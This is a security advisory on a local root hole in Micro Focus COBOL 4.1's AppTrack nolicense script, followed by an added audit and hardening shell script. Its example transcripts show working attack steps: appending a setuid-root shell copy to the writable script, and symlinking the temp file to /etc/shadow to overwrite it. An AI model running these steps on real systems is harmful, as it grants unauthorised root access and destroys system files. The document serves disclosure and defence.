COMMAND

    Cobol

SYSTEMS AFFECTED

    Microfocus Cobol

PROBLEM

    Dixie Flatline found the following.  If the AppTrack feature is
    enabled, the default install of MicroFocus Cobol 4.1 (Merant's
    commercial suite of COBOL utilities) contains a security hole that
    can lead to root compromise.

    In the default install, /var/mfaslmf is installed mode 777, and
    /var/mfaslmf/nolicense, the shell script that AppTrack runs when
    no license is available, is installed mode 666.  nolicense contains
    the following:

        # Append into a logfile
        if test ! -f /var/mfaslmf/USERLOG
        then
                touch /var/mfaslmf/USERLOG
                chmod 666 /var/mfaslmf/USERLOG
        fi
        echo `date`:No license  $* >> /var/mfaslmf/USERLOG
        
        #mail a specified user (commented out by default. substitute the user name)
        echo `date`:No license  $* > /var/mfaslmf/tmpmess
        # mail -s "No AS license"  user-name  < /var/mfaslmf/tmpmess
        rm /var/mfaslmf/tmpmess

    This presents two major types of problem:
    * Because of the permissions on nolicense, unprivileged users  can
      edit  the  file  to  insert  arbitrary commands into the script.
      Then,  if  AppTrack  is  enabled  (see  below)  and  the trigger
      condition occurs (again, see  below), that code can  be executed
      with superuser privileges.
    * The   use   of    predictably-named   temporary   files   in   a
      world-writeable  directory  can  allow  local  users  to append,
      overwrite or destroy arbitrary  files, even if nolicense  itself
      is made non-world-writeable.

    Example of the first problem:

        $ id
        uid=500(echo8) gid=10(users)
        $ cat >> /var/mfaslmf/nolicense
        /bin/cp /bin/ksh /tmp; chmod 4755 /tmp/ksh
        ^D
        
        # create a condition under which all available AS licenses are used up.
        # This should not be difficult. When this occurs, /var/mfaslmf/nolicense
        # will run.
        
        $ ls -alt /tmp/ksh
        -rwsr-xr-x   1 root     other     186356 Dec 26 17:04 /tmp/ksh
        $  /tmp/ksh
        # id
        uid=500(echo8) gid=10(users) euid=0(root)
        #

    Example of the second:

        $ id
        uid=500(echo8) gid=10(users)
        $ cd /var/mfaslmf
        $ ln -s /etc/shadow tmpmess
        
        # Again, create a condition under which nolicense will run. This
        # example will overwrite /etc/shadow.
        
        $ cat /etc/shadow (would need to be done as root, but you get the point...)
        Tue Dec 26 17:08:45 EST 2000:No license
        $

    These holes can  only be exploited  if the AppTrack  functionality
    is enabled.  This feature is off by default. 4.1 for Solaris/sparc
    is the only version tested.

SOLUTION

    Change the permissions on /var/mfaslmf and rewrite nolicense.  At a
    minimum, /var/mfaslmf should not be world-writable and nolicense
    should not be writable by unprivileged users; note that tightening
    nolicense alone does not address the second problem, because the
    predictable tmpmess file is still created in a directory where any
    local user can plant a symlink.  According to the documentation,
    nolicense is provided as "an example" and the user "can edit the
    nolicense script to your requirements."  IMO, example code with
    serious security holes should NOT be distributed.  If you don't
    need this feature, delete the script.  Regardless of whether or not
    you need AppTrack to work, you should be able to change the
    permissions on /var/mfaslmf to something safer.
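
    The following is an added example, not code from the advisory or
    from Merant/MicroFocus.  It covers both halves of the write-up: an
    audit that checks a directory for the insecure layout described
    under PROBLEM (world-writable directory, writable nolicense,
    planted symlinks), and a hardened rewrite of the logging part of
    nolicense along the lines of the SOLUTION above (USERLOG created
    0600, symlinks refused, no predictable tmpmess file).  The
    directory is passed as an argument rather than hard-coded so the
    script can be tried on a scratch copy by an ordinary user; the
    NOLICENSE_MAILTO variable is an assumption of this example, not a
    setting the product defines.

```shell
#!/bin/sh
# Added example (not code from the advisory or from Merant/MicroFocus).
# Two pieces: an audit of the layout the advisory describes, and a
# hardened replacement for the logging part of nolicense.  Both take the
# directory as an argument instead of hard-coding /var/mfaslmf so they
# can be exercised against a scratch copy by an ordinary user.

# 10-character mode string of a path as printed by ls, e.g. drwxrwxrwt.
# ls -ld reports a symlink itself rather than its target.
mode_of() {
    ls -ld "$1" | cut -c1-10
}

# Character N (1-based) of a mode string: 6 = group write, 9 = other
# write, 10 = other execute / sticky bit.
mode_char() {
    printf '%s' "$1" | cut -c"$2"
}

# Audit DIR.  Prints one "audit:" line per finding and returns 0 if the
# layout is safe, 1 otherwise.  The findings map onto the two problems
# in the advisory: a world-writable directory without the sticky bit
# (USERLOG and tmpmess can be replaced by symlinks), a nolicense that
# group or other can write (commands run as root when the trigger
# fires), and a USERLOG or tmpmess that is already a symlink.
audit_mfaslmf() {
    dir=$1
    bad=0
    [ -d "$dir" ] || { echo "audit: $dir is not a directory"; return 1; }

    m=$(mode_of "$dir")
    if [ "$(mode_char "$m" 9)" = w ]; then
        case $(mode_char "$m" 10) in
            t|T) ;;   # sticky bit: only the owner may unlink or replace entries
            *) echo "audit: $dir is world-writable without sticky bit ($m)"
               bad=1 ;;
        esac
    fi

    if [ -e "$dir/nolicense" ]; then
        m=$(mode_of "$dir/nolicense")
        if [ "$(mode_char "$m" 6)" = w ] || [ "$(mode_char "$m" 9)" = w ]; then
            echo "audit: $dir/nolicense is writable by group/other ($m)"
            bad=1
        fi
    fi

    for f in USERLOG tmpmess; do
        if [ -L "$dir/$f" ]; then
            echo "audit: $dir/$f is a symlink to $(readlink "$dir/$f")"
            bad=1
        fi
    done
    return "$bad"
}

# Hardened replacement for the logging part of nolicense.  Compared with
# the shipped script: USERLOG is created mode 0600 rather than 0666, a
# USERLOG that is a symlink or not a regular file is refused instead of
# followed, and the optional notification is piped straight to mail so
# no predictable tmpmess file is ever created.  Returns 0 if the entry
# was written, 1 if it refused.  The check-then-append is still a race
# window; the real fix is a directory in which untrusted users cannot
# create entries at all, which is what audit_mfaslmf checks for.
log_no_license() {
    dir=$1; shift
    log=$dir/USERLOG
    msg="$(date):No license  $*"

    if [ -L "$log" ] || { [ -e "$log" ] && [ ! -f "$log" ]; }; then
        echo "nolicense: refusing to write $log (not a regular file)" >&2
        return 1
    fi
    # Create under a restrictive umask in a subshell so the caller's
    # umask is left alone (the shipped script did touch + chmod 666).
    [ -e "$log" ] || ( umask 077; : > "$log" ) || return 1
    echo "$msg" >> "$log" || return 1

    # NOLICENSE_MAILTO is an assumed variable name for this example, not
    # a setting the product defines; leave it unset to skip the mail.
    if [ -n "${NOLICENSE_MAILTO:-}" ]; then
        echo "$msg" | mail -s "No AS license" "$NOLICENSE_MAILTO"
    fi
    return 0
}

# Entry point: sh nolicense_audit.sh /var/mfaslmf
[ $# -eq 0 ] || audit_mfaslmf "$1"
```

    Run it as "sh nolicense_audit.sh /var/mfaslmf" to list findings; a
    clean layout produces no output and exit status 0.  The symlink and
    mode checks in log_no_license narrow the window but do not close it
    (a local user who can still create entries in the directory can
    swap the file between the check and the append), which is why the
    audit treats a world-writable, non-sticky /var/mfaslmf as a finding
    in its own right.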